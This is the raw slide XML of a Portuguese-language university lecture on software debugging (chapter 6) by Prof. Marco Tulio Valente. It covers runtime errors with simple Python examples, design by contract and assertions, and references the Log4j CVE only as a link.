          <p:cNvPr id="90" name="Google Shape;90;p23"/>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91" name="Google Shape;91;p23"/>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92" name="Google Shape;92;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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3" name="Shape 93"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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1.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1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;53;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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hyperlink" Target="https://creativecommons.org/licenses/by/3.0/br/"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7.xml"/><Relationship Id="rId3"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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://guava.dev/releases/19.0/api/docs/com/google/common/base/Preconditions.html"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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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3.xml"/><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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId4"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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.ycombinator.com/item?id=40685157" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cve.org/CVERecord?id=CVE-2021-44228" TargetMode="Externa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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.scworld.com/news/vulnerable-instances-of-log4j-still-being-used-nearly-3-years-later" TargetMode="Externa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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2303250"/>
            <a:ext cx="8520600" cy="8418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sz="2650"/>
              <a:t>Compreensão, Manutenção e Evolução de Software</a:t>
            </a:r>
            <a:endParaRPr sz="2650"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3550"/>
              <a:t>Cap. 6 - Depuração</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3550"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Prof. Marco Tulio Valente</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1844"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p2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01" name="Google Shape;101;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751450" y="4455775"/>
            <a:ext cx="7695900" cy="525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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Licença </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CC-BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>; permite copiar, distribuir, adaptar etc; porém, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>créditos devem ser dados ao autor dos slides</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2164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Erros em Tempo de Execu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção (geram stack trace)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="1000075"/>
            <a:ext cx="3689700" cy="36093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600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Division by zero</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>x = 10 / 0</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Null pointer dereference</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>obj = None</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>print(obj.attribute)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Invalid input</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>value = int("abc")</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Out-of-bounds access</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>arr = [1, 2, 3]</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>print(arr[5])</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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3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Programa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção por Contrato</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8702100" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Interface de um módulo inclui:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Não apenas assinatura dos métodos públicos</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Mas também pré-condições, pós-condições, invariantes</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Verificação pode ocorrer por meio de assert</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Inserir "assert" no código pode ajudar a localizar um bug</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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80" name="Google Shape;180;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7862350" y="430800"/>
            <a:ext cx="1236025" cy="1614601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
